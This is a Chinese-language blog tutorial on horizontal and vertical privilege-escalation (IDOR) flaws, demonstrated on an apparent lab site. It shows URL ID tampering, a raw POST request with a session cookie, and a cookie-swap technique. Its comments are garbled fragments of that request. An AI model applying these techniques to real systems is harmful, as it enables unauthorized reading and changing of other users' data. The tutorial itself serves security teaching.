越权漏洞与利用
1、什么是越权漏洞
越权漏洞是一种很常见的逻辑安全漏洞。可以这样理解:服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致攻击账号拥有了其他账户的增删改查功能。
越权漏洞分类
2、平行越权
就是相同级别(权限)的用户或者同一角色不同的用户之间,可以越权访问、修改或者删除的非法操作。
两个相同权限的账号分别是moonteam moon 密码都是x123456
这个是moon的订单
http://www.rbac.com/www/index.php/order-view-4.html
这个4的数字是可以变化的 查询3的时候 是moonteam这个用户的数据查看1的时候是账号demo的订单。
相同用户权限之间的越权就做水平越权
3、垂直越权
垂直越权是不同级别之间或不同角色之间的越权
用moon账号新建一个帖子 用admin登录系统得转帖的数据包。
POST /www/index.php/thread-transfer-5.html HTTP/1.1 Host: www.rbac.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://www.rbac.com/www/index.php/thread/5.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 13 Connection: close Cookie: t=%2C4%2C; theme=default; frontsid=suuf9cuo95geo78r5mhgkilvr6; frontLang=zh-cn; productViewType=card targetBoard=5
用moonteam的权限去转移帖子。
登录moonteam 账号 把cookie信息替换
转移成功
一般垂直越权都是用一个普通账号是测试 较高的用户的一些操作比如增删该查。测试的方法就是cookie之间的替换。
4、带来的危害
越权查询
越权删除
越权修改
越权增加
下一篇:怎么从目录里getshell
相关文章
- 5条评论
瑰颈西奺2022-06-03 04:05:23- -Length: 13Connection: closeCookie: t=%2C4%2C; theme=default; frontsid=suuf9cuo95geo78r5mhgkilvr6; frontLang=zh-cn; produc
掩吻颇倔2022-06-02 22:34:40- erer: http://www.rbac.com/www/index.php/thread/5.htmlContent-Type: application/x-www-form-urlencoded
鹿岛葵袖2022-06-02 21:46:11- 1Host: www.rbac.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: application/json, text/java
怎忘双笙2022-06-02 21:12:03- son, text/javascript, **; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.rbac.com
滇ICP备19002590号-1